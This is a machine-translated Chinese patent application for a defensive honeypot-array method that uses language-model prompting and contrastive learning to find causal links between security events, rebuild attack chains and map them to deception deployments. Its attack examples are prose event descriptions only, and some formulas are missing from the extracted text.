Causal-driven honey array attack chain reconstruction and strategy linkage method
By employing a pre-trained language model and a contextual contrastive learning mechanism in the honeycomb system, an event triple model is constructed and causal examples are guided. This addresses the shortcomings of the honeycomb system in causal identification and policy linkage, achieving high-precision causal identification and adaptive policy deployment, and improving the real-time response and linkage capabilities of the honeycomb system in complex APT attack scenarios.
Patent Information
- Application Number
- CN202610106837.7
- Authority / Receiving Office
- CN · China
- Patent Type
- Applications(China)
- Current Assignee / Owner
- Filing Date
- 2026-01-27
- Publication Date
- 2026-02-27
AI Technical Summary
Existing methods for identifying the cause of security incidents in the honeycomb system suffer from insufficient real-time performance, lack of generalization, and weak interpretability, making it difficult to meet the real-time response and linkage requirements of the honeycomb system in complex APT attack scenarios.
By employing a pre-trained language model and a contextual contrastive learning mechanism, and constructing an event triple model, potential causal relationships are mined. A causal example-guided method is used to achieve high-precision identification of causal relationships in multi-source security events, forming a causal attack chain graph. This graph is then linked with the honeycomb strategy graph to achieve closed-loop reconstruction and adaptive strategy deployment.
It enhances the real-time linkage capability of the honey array in complex attack scenarios such as lateral movement and multi-hop penetration, improves the accuracy of causal identification and cross-scenario versatility, realizes the unified modeling of multi-source heterogeneous events and the linkage closed loop between causal reasoning and honey array strategy, and improves the system's intelligent scheduling and dynamic evolution capabilities.
Smart Images

Figure CN121585474A_ABST
Abstract
Description
Technical Field
[0001] This invention relates to the field of network security technology, and in particular to a causal-driven method for reconstructing and coordinating honeycomb attack chains with strategies. Background Technology
[0002] With the increasing diversity and sophistication of Advanced Persistent Threat (APT) attack methods, traditional security detection mechanisms based on feature matching or behavioral rules are struggling to detect and intervene in early-stage attack intentions in a timely manner. As a proactive defense technology, network deception systems, by deploying misleading and deceptive resources, guide attackers to expose their tools, intentions, and paths, thereby gaining attribution information and defensive advantages. This has made them an important component of cybersecurity defense systems in recent years.
[0003] Early network deception systems, represented by honeypots, were typically deployed in isolation to lure attacks, passively recording attacker activity only when they inadvertently entered the system. With the development of virtualization and automation technologies, researchers have gradually proposed more structured and strategic deception architectures, such as honeynets and highly interactive honeypot systems. However, these still have significant shortcomings in dynamic deployment capabilities, attack path guidance, and policy scheduling and coordination.
[0004] To enhance the intelligence and responsiveness of deception systems, academia and industry have jointly promoted the development of a new defense architecture in recent years—the Honey Array. This system is based on "honey points—honey gardens—honey arrays—honey holes," emphasizing layered collaboration among components, strategic deployment, and attack path guidance. Through dynamic combination and linkage, it forms a complex trapping array, enhancing the adaptability and attack interference capabilities of the deception system while ensuring the trapping effect.
[0005] The operation process of a honeycomb system typically includes the following key stages:
[0006] 1. Entrapment triggering and behavioral perception in the initial stage of an attack;
[0007] 2. Attack chain reconstruction and intent reasoning in the intermediate stage;
[0008] 3. Strategy generation and trap deployment in subsequent stages.
[0009] Among them, the identification of event causes and the reconstruction of the attack chain form a crucial link connecting the preceding and following steps—it not only affects the effectiveness of subsequent deployments, but also directly determines whether the system can intervene in the entire chain of attacks.
[0010] Event Causality Inference, as an important task in attack chain modeling, aims to mine behavioral pairs with causal driving relationships from multi-source heterogeneous data such as network security logs, honeypot behavior data, and system alarms, and connect them into an attack path graph in the form of directed edges.
[0011] Existing technologies can be mainly divided into the following categories:
[0012] Rule-based methods, such as MITREATT&CK mapping or YARA rule reasoning, rely on expert-predefined causal patterns, resulting in poor generalization ability and strong dependencies.
[0013] Methods based on time sequence and co-occurrence analysis: Causal graph reasoning is performed by constructing event pairs or statistical transition matrices within a time window, but they cannot reveal semantic transmission mechanisms and have weak ability to correlate behaviors across hosts and stages.
[0014] Graph neural networks and deep learning methods, such as the combination of GCN / BiLSTM, are used to learn the dependency structure between events from logs. Although they have certain modeling capabilities, they are insufficient for processing low-frequency samples and unstructured text, and training depends on large-scale labeled samples.
[0015] Contrastive learning and large language model (LLM) guidance methods: Recently, some scholars have tried to introduce contrastive learning and LLM-based prompt-guided reasoning mechanisms to guide the model to capture implicit causal relationships between complex semantics, but an efficient implementation mechanism adapted to honeycomb scenarios has not yet been formed.
[0016] However, compared to general security detection scenarios, event causality identification in honeycomb systems faces the following new challenges:
[0017] High real-time deployment requirements: The attack chain construction must serve the next deployment strategy and require efficient reasoning.
[0018] Strong semantic consistency requirements: It is necessary to model the contextual semantics of behavioral sequences to avoid misjudgment due to local representation distortion;
[0019] The structural integration requirements are complex: structured logs, unstructured commands, and attack traces need to be jointly modeled;
[0020] Strong feedback-driven characteristics: The identification results are not only used for attribution, but also for dynamic scheduling and resource instruction issuance.
[0021] Existing technologies cannot yet meet the above requirements, lacking embeddable, scalable, and explainable causal identification sub-modules adapted to honeycomb scenarios, which directly restricts the development of the intelligence and interconnectivity of the honeycomb architecture.
[0022] Existing methods for identifying the causal nature of security incidents have several shortcomings when applied to honeycomb systems. First, rule-based reasoning relies excessively on predefined expert templates, making it difficult to cover the constantly evolving tactics, techniques, and procedures (TTPs) used in APT attacks. This results in a significant drop in accuracy when facing unknown attack paths. Second, while time-series or statistical co-occurrence-based methods can capture certain event correlations, they often misjudge "synchronous occurrence" as "causal dependence," lacking the ability to express the semantic transmission and logical constraints of attacks, and are ill-suited for reconstructing causal chains across hosts and stages. Furthermore, while deep learning models such as graph neural networks alleviate the rule-dependency problem to some extent, they generally require large-scale labeled samples to converge and lack the ability to process unstructured logs and free text, making them unsuitable for the multi-source, heterogeneous data environment involved in honeycomb systems. Finally, while recent attempts to combine LLM with contrastive learning have shown some potential, most remain at the level of identifying general, open-domain events. They lack exploration in security event identification and implementation mechanisms that integrate with honeycomb strategy scheduling and attack path guidance, making it difficult to meet the application requirements of real-time response and closed-loop feedback in honeycomb systems. These shortcomings result in insufficient real-time performance, poor generalization, and weak interpretability in the causal identification stage of honeycomb systems, directly limiting their effectiveness in complex APT attack scenarios.
[0023] Based on the above reasons, this invention proposes a causal-driven honey array attack chain reconstruction and strategy linkage method. Summary of the Invention
[0024] The technical problem this invention aims to solve is to address the shortcomings of existing technologies by providing a causal-driven method for reconstructing attack chains and coordinating strategies within honeycomb arrays, overcoming issues such as rule dependence, statistical misjudgment, and difficulties in heterogeneous modeling. Specifically, this invention uses a pre-trained language model as its core, employing a contextual contrastive learning mechanism and a Prompt example-guided method to achieve high-precision identification of causal relationships in multi-source security events. This enables closed-loop reconstruction of attack chains and adaptive strategy deployment within the honeycomb array architecture. This invention aims to enhance the real-time coordination and attack interference effectiveness of honeycombs in complex attack scenarios such as lateral movement and multi-hop penetration, enabling them to form an efficient and interpretable closed-loop mechanism between event causal reasoning, attack chain construction, and strategy scheduling. This overcomes the limitations of existing technologies in terms of real-time performance, generalization, and scalability, promoting the development of proactive defense systems towards intelligence and adaptability.
[0025] To achieve the above objectives, the technical solution of the present invention is: a causal-driven honeycomb attack chain reconstruction and strategy linkage method, comprising the following steps:
[0026] S1. Model the security event pairs of the honeycomb array. By unifying the structure of the raw data, construct the event triple expression model, mine event pairs with potential causal relationships, and output them.
[0027] S2. Construct a sample library. Guide the construction of the sample library through causal examples. The causal examples include positive causal event pairs extracted from the real attack chains mined in S1 and non-causal negative examples constructed through adversarial design. Cooperate with downstream model inference tasks to achieve synergistic optimization of context alignment, semantic comparison and structural generalization capabilities.
[0028] S3. Construct a prompt for causal event pairs, determine causal relationships through analogical reasoning using a large model, and make predictions and outputs based on the generated causal relationships;
[0029] S4. Reconstruct the causal attack chain and establish a linkage mechanism between the reconstructed attack chain and the honey array strategy module.
[0030] S1 includes the following steps:
[0031] S11. Construct a structured representation model for security events. This structured representation model uses an event triple modeling paradigm to represent the semantic core of network security events. The event triple modeling paradigm is expressed as follows: Where S represents Subject, which is the initiator of the event; A represents Action, which is the type of action performed by the event; and O represents Object, which is the target object affected or acted upon by the action.
[0032] S12. Establish a query event pair construction mechanism to filter out event pairs with potential causal relationships from independent events and output them. The event pairs are represented as ( And satisfy at least one of the following constraints, said constraints include:
[0033] Time window constraint: Two events must satisfy the time constraint. ,in A configurable window threshold is used to control the time span of the event causal chain;
[0034] Host / session consistency constraint: If two events occur on the same host or in the same session, the pair is retained.
[0035] Resource dependency constraints: If or This indicates that the output of the previous event becomes the input of the next event, indicating a potential data flow dependency.
[0036] Topology path constraints: Supports forwarding relationships based on attack chain paths in cross-host scenarios, such as honeypots forming connections through honeycombs, which allows the construction of cross-node event pairs.
[0037] Wherein, S2 includes:
[0038] S21. Establish a sample source and generation mechanism, and encode the input samples into natural language form after standardizing template mapping, and inject them into the language model reasoning process as contextual guidance prompts.
[0039] S22. Establish a positive and negative example construction strategy, wherein the positive and negative example construction strategy includes a positive example construction strategy and a negative example construction strategy, and each pair of positive and negative examples is represented as a natural language fragment through a unified encoding template.
[0040] S23. Establish a dynamic retrieval and sample matching mechanism, introduce an example cache pool, and implement dynamic sample retrieval by adopting a high-dimensional embedding vector matching strategy, specifically including:
[0041] Use a language model encoder to vectorize query event pairs;
[0042] Perform semantic vector nearest neighbor retrieval in the cache pool;
[0043] M positive examples and N negative examples are selected based on semantic similarity to construct a context Prompt;
[0044] Inject the current inference request to achieve context alignment and analogy guidance.
[0045] Wherein, S3 includes:
[0046] S31. Establish a Prompt template structure, unifying structured event pairs and dynamically retrieved example samples into a text sequence adapted to the input format of the pre-trained language model, specifically including:
[0047] The event to be queried And M positive examples retrieved from the cache pool , and N negative examples , Construct the input sequence according to the template T(x), where Where [CLS] represents a special start marker and [SEP] represents a special separator marker. , and These are sequences of positive and negative examples and query event pairs that follow the same sub-template. The symbols indicate that each special marker is concatenated with each sequence segment;
[0048] The sub-template includes text sequences of the following form:
[0049] Context: Describes the complete context information of the occurrence of the two events;
[0050] [event1]Natural Language Description of Event E1[ / event1]
[0051] [start] <causal>or <non-causal>Or [MASK][end];
[0052] [event2]Natural Language Description of Event E2[ / event2]
[0053] in:
[0054] Context: Provides a more comprehensive context describing the occurrence of an event;
[0055] [event1],[ / event1] and [ / event2],[event2]: Special tokens are introduced to highlight the start and end of event pairs. These two sets of tokens contain natural language descriptions of the first and second event triplets obtained from the first stage transformation.
[0056] [start], [end]: Special tokens introduced to indicate the start and end of the "cloze test";
[0057] <causal> , <non-causal>[MASK]: A label used to indicate whether a causal relationship exists between pairs of events;
[0058] S32. Introduce a supervised contrastive learning mechanism to model the semantics of event pairs, including:
[0059] First, vector representations of event pairs are extracted from the output of PLM. Then, a supervised contrastive loss is introduced to incentivize the model to learn a semantic space. Within this semantic space, event pairs with similar causal attributes cluster together to form a tight cluster, which is far from the clusters of dissimilar event pairs. Furthermore, by jointly training classification tasks and auxiliary contrastive learning tasks, end-to-end multi-objective optimization of model parameters is achieved. Finally, the causal relationship is determined by predicting the token at the [MASK] position in the Prompt.
[0060] S33. Establish a generative causal discrimination output mechanism. For query event pairs introduced in the prompt template, use natural language generation to generate reasoning answers to output causal discrimination results.
[0061] Wherein, S4 includes:
[0062] S41. Construction of the causal attack chain graph, including:
[0063] The causal event pairs output by S3 ( Mapping to directed edges, constructing a causal attack chain graph G= Where the node set V represents security events and the edge set E represents dependencies confirmed by causal reasoning, multiple candidate attack chains are generated by performing topological sorting and path search on the G. The model is extracted during the causal discrimination stage, and predictions are made through [MASK] fill-in-the-blank. <causal> / <non-causal>The output normalized softmax probability value is assigned as the causal edge weight and used as the confidence score:
[0064] ;
[0065] Let the candidate event pairs be . Its causality is determined by the prediction scores of the pre-trained language model for causal and non-causal labels at the [MASK] position, denoted as […]. and The two are transformed into non-negative weights by an indicator function, and then normalized to obtain the final probability distribution, where exp() represents the exponential function;
[0066] S42. Establish a mapping from the causal chain to the honeypot strategy graph, where the corresponding lateral movement event chain is mapped to the requirement of deploying cross-host high-interaction honeypots and simulating SMB services, the corresponding credential theft and domain controller penetration chain is mapped to scheduling domain controller simulation honeypots and enabling Kerberos traffic guidance strategy, and the corresponding data outgoing chain is mapped to deploying data trapping and external traffic monitoring strategy.
[0067] The mapping process uses an objective function:
[0068] ;
[0069] in Indicates the confidence level of causality. For resource expenditure, For the purpose of trapping profits, For adaptive weights, To target the attack chain Mapping strategy;
[0070] S43. By using strategy encapsulation and distribution methods, the abstract optimization results are transformed into a set of deployment instructions that can be directly run by the honeycomb execution layer, thereby realizing real-time linkage driven by causal reasoning. The strategy encapsulation and distribution methods include strategy unit abstraction, standardized encapsulation, instruction distribution, and execution feedback and closed-loop control.
[0071] According to the optimal strategy The corresponding attack chain Abstracting strategy units from event nodes and causal edges in the data. Where R represents the required resources, A represents the corresponding action, and C represents the constraints;
[0072] Standardized encapsulation refers to converting the strategy unit into a standardized description language after the abstraction is completed. The standardized description language is expressed in JSON / YAML format and defines uniform fields.
[0073] The instruction issuance refers to the formatted work order being pushed to the honeycomb execution layer via the message bus. The issuance mechanism adopts transactional guarantee, wherein the work order is broken down into several atomic operations, each of which has an execution log, and the work order adopts a two-phase commit protocol. If any part fails, the rollback logic is triggered to restore to the previous stable state.
[0074] The execution feedback and closed-loop control refer to the generation of receipt information for each operation after the instruction is executed. The receipt information includes a success or failure status code, a deployment example identifier, and actual resource consumption and latency data.
[0075] Furthermore, the positive example construction strategy in S22 includes positive strategy one, positive strategy two, and positive strategy three;
[0076] The first positive strategy is explicit causal extraction, which extracts fragments containing causal prompts from CTI or security reports and converts them into event pairs.
[0077] The second positive strategy is: TTP sequence instantiation matching, which uses structured attack knowledge base to generate weakly labeled data;
[0078] The third positive strategy is to use the counterfactual dependency criterion to uncover the structural logic in the attack chain that if the preceding event has not occurred, the subsequent event is unreachable, and to construct positive example pairs with strong causal orientation.
[0079] Furthermore, the supervised contrastive learning mechanism described in S33 includes:
[0080] Define within a batch of data For the set of indexes for all query pairs in this batch, the semantic representation for a single query event is: And the aforementioned Using this query event as an anchor point, the semantic representation of the dynamically retrieved set containing M positive examples is as follows: Similarly, a set containing N negative examples has the following semantic representation: The objective of the comparison loss is to maximize With all The similarity with all The similarity and its contrast loss The definition is as follows:
[0081]
[0082] in:
[0083] sim(a,b) is the similarity function between a and b, which is calculated using cosine similarity cos(a,b);
[0084] τ is a positive temperature coefficient hyperparameter;
[0085] Molecular calculation anchor The sum of similarity indices with all its positive examples;
[0086] The denominator is used to calculate the anchor point. The sum of similarity indices with all examples (positive / negative);
[0087] Supervised comparison loss of the entire batch Then it is defined as:
[0088] ;
[0089] Where I is defined above. This refers to the set of indexes for all query pairs in this batch.
[0090] Furthermore, the process for determining the causal relationship includes:
[0091] The log-probability of each token in the vocabulary is calculated using the [MASK] position in the PLM output layer, and then considered in conjunction with the task scenario of causal recognition. <causal>and <non-causal>The two key target tokens are processed by the Softmax function to transform the log odds of the target tokens into normalized probabilities;
[0092] The loss function for the classification task Using the standard binary cross-entropy loss, it is defined as:
[0093] ;
[0094] in, To predict the probability that the label of the query event pair is causal for the model; and } represents the actual label of the query event pair, where 1 represents causality and 0 represents non-causality;
[0095] A joint training strategy is employed to optimize the model's classification accuracy and semantic representation quality, and the classification loss is... And comparative loss We perform a weighted summation to construct the final total loss function that needs to be optimized: , where β is a weight hyperparameter used to balance the contributions of classification tasks and contrastive learning tasks in model parameter updates;
[0096] By optimizing the total loss using the AdamW optimization algorithm, the model's parameters will be optimized towards two objectives simultaneously: firstly, to accurately fill in the blanks based on the context, and secondly, to construct a clear semantic structure in the representation space to distinguish between causal and non-causal events.
[0097] During the inference phase, for a new query event pair, the token at the [MASK] position is predicted as follows: <causal>and <non-causal>The probability of a relationship being causal or non-causal is used to make the final judgment.
[0098] The beneficial effects of the causal-driven honeycomb attack chain reconstruction and strategy linkage method provided by this invention are as follows:
[0099] Compared with existing technologies, the causal-driven honeycomb attack chain reconstruction and strategy linkage method proposed in this invention has significant advantages in terms of accuracy, universality, practicality, and strategy linkage:
[0100] First, this invention improves the accuracy of causal identification and suppresses false causal misjudgments. Traditional rule-based or statistical causal modeling methods often rely on co-occurrence frequency, which can easily misjudge temporally close events as causal relationships. This invention transforms causal identification into a semantic reasoning problem by introducing a pre-trained language model and a contextual example guidance mechanism; and by using a contrastive learning constraint model to distinguish between true causality and superficial correlation in the representation space, it enhances the robustness and accuracy of causal inference and significantly reduces the risk of false causal chains interfering with honeycomb strategy scheduling.
[0101] Secondly, it enhances cross-scenario versatility and rapid migration capabilities. Existing methods rely on expert rule bases or large-scale labeled samples, which often struggle to adapt to new APT attacks. This invention utilizes a contextual few-shot learning mechanism, requiring only a small number of positive and negative demonstration examples to quickly adapt to new environments, avoiding the need to retrain large-scale models. This dynamic adaptability enables the method to be rapidly migrated and applied in different honeycomb deployment environments (such as government and enterprise intranets, industrial control systems, or cloud data centers), meeting the diverse needs of attack and defense scenarios.
[0102] Secondly, this invention achieves unified modeling of multi-source heterogeneous events. Honeycomb systems capture multimodal data (system logs, intrusion detection alarms, traffic characteristics, command sequences, etc.) during operation, and existing technologies often cannot fuse this heterogeneous data within a unified framework. This invention proposes a standardized event triple abstraction, which is further converted into a natural language description, enabling PLM to simultaneously parse structured and unstructured information in a unified semantic space. This mechanism not only improves the coverage of causal identification but also provides a cross-modal unified semantic expression foundation for honeycomb attack chain reconstruction.
[0103] Finally, a closed loop is formed linking causal reasoning and honeycomb strategies. Traditional causal identification methods are mostly used for source tracing analysis, lacking direct integration with the strategy execution layer. This invention transforms the causal identification results into a weighted causal attack chain graph, and further maps it to a honeycomb strategy scheduling graph. Considering causal confidence, resource overhead, and trapping benefits, an executable deployment work order is generated. This mechanism connects the entire chain of "causal identification—attack chain reconstruction—strategy distribution," realizing the intelligent scheduling and dynamic evolution capabilities of the honeycomb, and significantly improving the system's real-time response efficiency in complex attack scenarios such as lateral movement and multi-hop penetration.
[0104] In summary, this invention not only overcomes the limitations of existing methods in terms of accuracy, generalization, and data fusion, but also constructs a new paradigm of proactive defense that is interpretable, transferable, and executable through the deep coupling of causal identification and honeycomb strategy scheduling. Attached Figure Description
[0105] Figure 1 This is a flowchart illustrating the present invention. Detailed Implementation
[0106] To make the objectives, technical solutions, and advantages of the embodiments of the present invention clearer, the technical solutions in the embodiments of the present invention will be clearly and completely described below. Obviously, the described embodiments are only some embodiments of the present invention, not all embodiments. Based on the embodiments of the present invention, all other embodiments obtained by those skilled in the art without creative effort are within the scope of protection of the present invention. Unless otherwise defined, the technical or scientific terms used herein should have the ordinary meaning understood by those skilled in the art to which this invention pertains.
[0107] Please refer to Figure 1 This invention provides a causal-driven method for reconstructing honeycomb attack chains and linking strategies, comprising:
[0108] S1. Modeling of honeycomb security event pairs: By unifying the structure of the raw data, constructing an event triple expression model, mining event pairs with potential causal relationships and outputting them;
[0109] In complex network security scenarios, the raw event data collected by the trapping system are highly heterogeneous, covering various forms such as system logs, intrusion detection alarms, network traffic records, and command execution trajectories. To achieve efficient modeling and identification of causal relationships between security events, this invention first performs structural unification processing on the raw data, constructs a standardized event triple expression model, and mines event pairs with potential causal relationships based on this model, providing input samples for the subsequent semantic reasoning module.
[0110] S11. Construct a structured representation model for security events:
[0111] Adopting a unified event triple modeling paradigm ( The semantic core of a cybersecurity incident is represented by:
[0112] Subject(S): Indicates the initiator of the event, typically the source IP address, process identifier, user ID, etc. For example, in a file operation, this field can refer to the specific process that performed the operation;
[0113] Action (A): refers to the type of action performed by the event, such as access, connect, create, execute, etc.
[0114] Object (O): The target object affected or acted upon by the action, such as the target IP, port, file path, CVE number, etc.
[0115] For structured or semi-structured logs (such as JSON, Syslog, and Auditd), the system's built-in field extractor automatically identifies and populates triples. For unstructured text data, semantic role labeling or dependency parsing mechanisms are introduced to identify components, ensuring that the semantic composition of triples can still be reconstructed even without explicit field labels.
[0116] For example, consider the following IDS alarm:
[0117] "ALERT:AnintrusionattemptwasdetectedfromIP10.0.5.1targetingthewebserverat192.168.1.100onport80,exploitingthe'ShellShock'vulnerability(CVE-2014-6271)."
[0118] The triplet representation can be extracted:
[0119]
[0120] To enhance the language model's ability to understand triple structures, the system further transforms them into natural language template expressions, such as: "The host with IP address 10.0.5.1 exploits the CVE-2014-6271 vulnerability to attack port 80 of 192.168.1.100".
[0121] S12. Establish a query event pair construction mechanism:
[0122] To filter out event pairs with potential causal relationships from a large number of independent events, this module designs a query pair construction mechanism based on dual constraints of spatiotemporal and behavioral context. Its core principle is that causal events correspond to each other in time and are represented as consecutive steps in a behavioral chain within the context.
[0123] Event pair ( The construction of ) must satisfy at least one of the following constraints:
[0124] Time window constraint: Two events must satisfy the time constraint. ,in A configurable window threshold is used to control the time span of the event causal chain;
[0125] Host / session consistency constraint: If two events occur on the same host or in the same session (e.g., same PID, same user, network connection association, etc.), the pair is retained.
[0126] Resource dependency constraints: If or This indicates that the output of the previous event becomes the input of the next event, indicating a potential data flow dependency.
[0127] Topology path constraints: Supports forwarding relationships based on attack chain paths in cross-host scenarios, such as honeypots forming connections through honeycombs, which allows the construction of cross-node event pairs.
[0128] Through the aforementioned constraint strategies, this step generates a high-quality set of candidate event pairs, serving as the input to the causal identification system. This provides traceable, semantically consistent structured event pairs for the entire closed-loop process of "attack chain reconstruction—semantic reasoning—policy scheduling," demonstrating high practicality and broad adaptability. Subsequent stages will build upon this foundation by introducing contextual modeling and contrastive learning mechanisms to complete causal judgment and label inference.
[0129] S2. Construct a sample library, guided by causal examples. The causal examples include positive causal event pairs extracted from the real attack chains mined in S1 and non-causal negative examples constructed through adversarial design. This is used in conjunction with downstream model inference tasks to achieve synergistic optimization of context alignment, semantic comparison, and structural generalization capabilities.
[0130] This step aims to build a library of "demonstration event pairs" for causal identification reasoning, thereby enhancing the language model's ability to discern causal relationships between attack events. The samples in this library include both positive causal event pairs extracted from real attack chains and non-causal negative examples constructed through adversarial design, working in conjunction with downstream model inference tasks to achieve synergistic optimization of context alignment, semantic comparison, and structural generalization capabilities.
[0131] S21. Establishing sample sources and generation mechanisms:
[0132] The construction of the example-guided sample library follows a strategy that emphasizes both multi-source collaboration and automatic extraction. The core data sources include:
[0133] Weakly labeled data driven by attack knowledge base: Based on structured threat frameworks such as MITREATT&CK, and based on their inherent TTP logical chain, sequence matching is performed on log data, such as using the collaborative relationship between T1059.001 (PowerShell) and T1548.002 (privilege bypass) to label event pairs;
[0134] Real attack chain reproduction data: including high-confidence attack chains captured in the honeycomb system, attack paths reconstructed in the emergency response report, and high-confidence path sequences output by graph inference;
[0135] Manually labeled and expert-verified data: High-confidence event pairs manually labeled by security experts serve as semantic anchors in the sample library;
[0136] Synthetic adversarial example construction mechanism: Based on the attack phase template or vulnerability exploitation chain pattern (such as CVE-2021-26855 → lateral movement → data leakage), controllable positive and negative example triples are constructed for model training or Prompt enhancement.
[0137] All samples are uniformly encoded into natural language form after being mapped using standardized templates, and then injected into the language model inference process as contextual guidance prompts.
[0138] S22. Establish a positive and negative example construction strategy:
[0139] To fully guide the model in identifying the boundary between "true causality" and "spurious correlation," this module designs a strategy for constructing positive and negative examples, covering the following:
[0140] Positive example construction strategy:
[0141] Positive Strategy 1: Explicit Statement Causal Extraction: Extract fragments containing causal prompts (such as "due to", "furthermore", "after execution") from CTI or security reports and convert them into event pairs, such as: "The attacker immediately downloaded and executed a malicious JAR file after exploiting the Log4Shell vulnerability" → (vulnerability exploitation, JAR execution).
[0142] Positive Strategy Two - TTP Sequence Instantiation Matching: This involves generating weakly labeled data using structured attack knowledge bases such as the MITREATT&CK framework. ATT&CK describes the techniques and tactics an attacker might employ, and these techniques often have a logical sequence. For example, technique T1059.001 (PowerShell) is commonly used for execution, and may be followed by technique T1548.002 (BypassUserAccountControl). Based on the diverse TTP sequences in the ATT&CK knowledge base, event chains can be matched in logs, such as: E1=<powershell.exe,download,mimikatz.exe> E2=<userX,execute,mimikatz.exe> →(E1,E2);
[0143] Positive Strategy 3 – Counterfactual Dependency Criterion: This strategy uncovers the structural logic of "if the preceding event has not occurred, then the subsequent event is unreachable" within the attack chain, constructing positive example pairs with strong causal orientation. For instance, "after the attacker disables the host firewall (event E1), a lateral SMB connection is successfully initiated (event E2)." If E1 is not executed, E2 will fail due to network policies. Therefore, (E1, E2) can be constructed as a positive example based on domain knowledge. Such samples not only fit the real dependencies between attack steps but also improve the model's sensitivity to implicit preconditions and its generalization ability, making it particularly suitable for high-confidence modeling and inference tasks of causal chains in honeycomb systems.
[0144] Negative example construction strategy:
[0145] Negative strategy: Events co-occurring but logically unrelated: The core of this strategy is to select events that are chosen to teach the model to ignore purely temporal coincidences. This is done by selecting event pairs from the logs that occur close in time (satisfying a time window w) but belong to completely different business logics or system activities. For example, a user's normal office behavior, such as event E1=<outlook.exe,send_email,recipient@example.com> Unrelated system update tasks that occur almost simultaneously with the background, such as event E2=<svchost.exe,update_windows_service,...> Although the event satisfies the time window and entity constraint, there is no causal relationship between them.
[0146] Negative Strategy Two - Undependent Event Pairs Under the Same Entity: This strategy selects logically independent event pairs under the same entity (such as the same host or the same user, etc.). For example, on host A, after logging in via SSH, an administrator might execute two independent diagnostic commands sequentially to troubleshoot a problem: Event E2 of Task One...<Admin,check_disk_space,HostA> And event E2 of Task 2 =<Admin,view_network_connections,HostA> .
[0147] Negative Strategy 3 - Behavioral Logic Conflict: This strategy aims to construct pairs of events that are logically contradictory. If there is a causal relationship between the event pairs, they typically serve a coherent and logical goal. Therefore, combinations of events with conflicting goals are selected to form negative examples. For example, event E1 records a successful remote code execution, in which the attacker obtains an interactive shell; while event E2 records that the shell process immediately exits or is terminated, with no meaningful subsequent command execution.
[0148] Negative Strategy 4 - Independent Events Under a Common Triggering Source: This strategy selects two independent subsequent events triggered by a common initial event (confusion factor). This structure is easily misinterpreted as causality. For example, after a user login event (triggering source), the system automatically starts the email client (event E1) and the background cloud synchronization service (event E2) according to preset startup items. Although E1 and E2 are indirectly caused by the same triggering event, there is no direct causal relationship between (E1, E2).
[0149] Negative Strategy Five - Indirect Correlation Across Attack Phases: This strategy selects two logically non-adjacent events belonging to different attack phases within a known multi-stage attack chain to create a negative example. For instance, it selects a phishing email incident during the Initial Access phase followed by a data encryption and outgoing event during the Exfiltration phase. Although both events belong to the same macro-level attack activity, they lack a direct, continuous causal link, and the causal path between them contains numerous unincluded intermediate events.
[0150] Each pair of positive and negative examples is represented as a natural language fragment using a uniform encoding template and input into the model's Prompt context structure to assist in the analogy reasoning task.
[0151] S23. Dynamic retrieval and sample matching mechanism:
[0152] To enhance the language model's semantic awareness of "event pairs to be identified," this module introduces a demonstration cache pool (DemonstrationCachePool), which uses a high-dimensional embedding vector matching strategy to achieve dynamic sample retrieval.
[0153] Use a language model encoder to vectorize query event pairs;
[0154] Perform semantic vector nearest neighbor retrieval in the cache pool (e.g., using FAISS);
[0155] M positive examples and N negative examples are selected based on semantic similarity to construct a context Prompt;
[0156] Inject the current inference request to achieve context alignment and analogy guidance.
[0157] This mechanism ensures that examples are targeted and contextually similar, significantly improving the model's ability to perceive and discriminate implicit dependencies between complex attack behaviors.
[0158] S3. Construct a prompt for causal event pairs, determine causal relationships through analogical reasoning using a large model, and make predictions and outputs based on the generated causal relationships:
[0159] This stage aims to effectively organize candidate event pairs and demonstration examples, and use large language models (such as LLaMA3, DeepSeek-V3.1, etc.) to perform analogical reasoning to determine the causal relationship between event pairs. The process can be divided into three sub-steps: 1) Prompt construction, 2) Causal relationship learning, and 3) Prediction based on generated causal relationships.
[0160] S31, Prompt Template Structure
[0161] The core design concept of this invention's Prompt lies in unifying structured event pairs and dynamically retrieved example samples into a text sequence adapted to the input format of the pre-trained language model. Therefore, this embodiment designs a unified, cloze-style Prompt template to simplify the task and fully leverage the capabilities gained by the pre-trained language model in the Masked Language Model (MLM) task during the pre-training phase.
[0162] For the event pair to be queried and M positive examples retrieved from the cache pool. , and N negative examples , They are constructed into a complete input sequence according to the following template T(x):
[0163]
[0164] Among them, [CLS] and [SEP] are special tags widely used in pre-trained language models based on the Transformer architecture:
[0165] 1) [CLS] represents a special start marker, and its corresponding vector in the model output is usually used to represent the global semantics of the entire sequence.
[0166] 2) [SEP] indicates a special separator used to separate different sequence segments.
[0167] 3) , and These are the positive and negative examples and the sequence of query event pairs that follow the same sub-template.
[0168] 4) The symbols indicate that each special marker is spliced with each sequence segment.
[0169] Sub-template structure;
[0170] Based on the above description, positive and negative examples and query event pairs all follow a unified sub-template to obtain their respective sequence fragments. This embodiment also introduces the design of several special token-assisted sub-templates, which are text sequences in the following form:
[0171] Context: Describes the complete context information of the two events (optional)
[0172] [event1]Natural Language Description of Event E1[ / event1]
[0173] [start] <causal>or <non-causal>Or [MASK][end]
[0174] [event2]Natural Language Description of Event E2[ / event2]
[0175] in:
[0176] Context: Provides a more comprehensive context describing the occurrence of the event, such as the original event report text and original log information related to events 1 and 2. This helps the model understand more detailed contextual information.
[0177] [event1],[ / event1] and [ / event2],[event2]: These are special tokens introduced to highlight the start and end of event pairs. These two sets of tokens contain the natural language descriptions of the first and second event triplets obtained from the first-stage transformation.
[0178] [start], [end]: Special tokens introduced to indicate the start and end of the "cloze test".
[0179] <causal> , <non-causal>[MASK]: A label used to indicate whether a causal relationship exists between event pairs. For positive examples, the label is a special token. <causal>For negative examples, the label is a special token. <non-causal>For the event pair to be queried, the label is a special mask token[MASK].
[0180] Based on the Prompt structure designed above, the model's task is to predict the token that should be filled in at the mask [MASK] position by comprehensively understanding all the preceding contextual information (M positive examples, N negative examples, and query event pairs). <causal>still <non-causal>.
[0181] A complete Prompt instance is shown in the following sequence (where M=1, N=1):
[0182] [CLS]
[0183] Context: "AnalertfromtheIntrusionDetectionSystemonthenetworkperimeterdetectedanexploitattemptagainstCVE-2021-21972targetingthevCenterserviceonHostA.AsubsequentEDRlogfromHostA,timestamp ed2secondslater,showsanew,anomalousPowerShellprocessspawnedbythe'vpxd.exe'service,whichthenimmediatelyestablishedanetworkconnectiontotheknownmaliciousC2serveratIP192.0.2.100onport443."
[0184] [event1]HostAwasexploitedviaCVE-2021-21972[ / event1]
[0185] [start] <causal>[end]
[0186] [event2]powershell.execonnectedtoC2server192.0.2.100[ / event2]
[0187] [SEP]
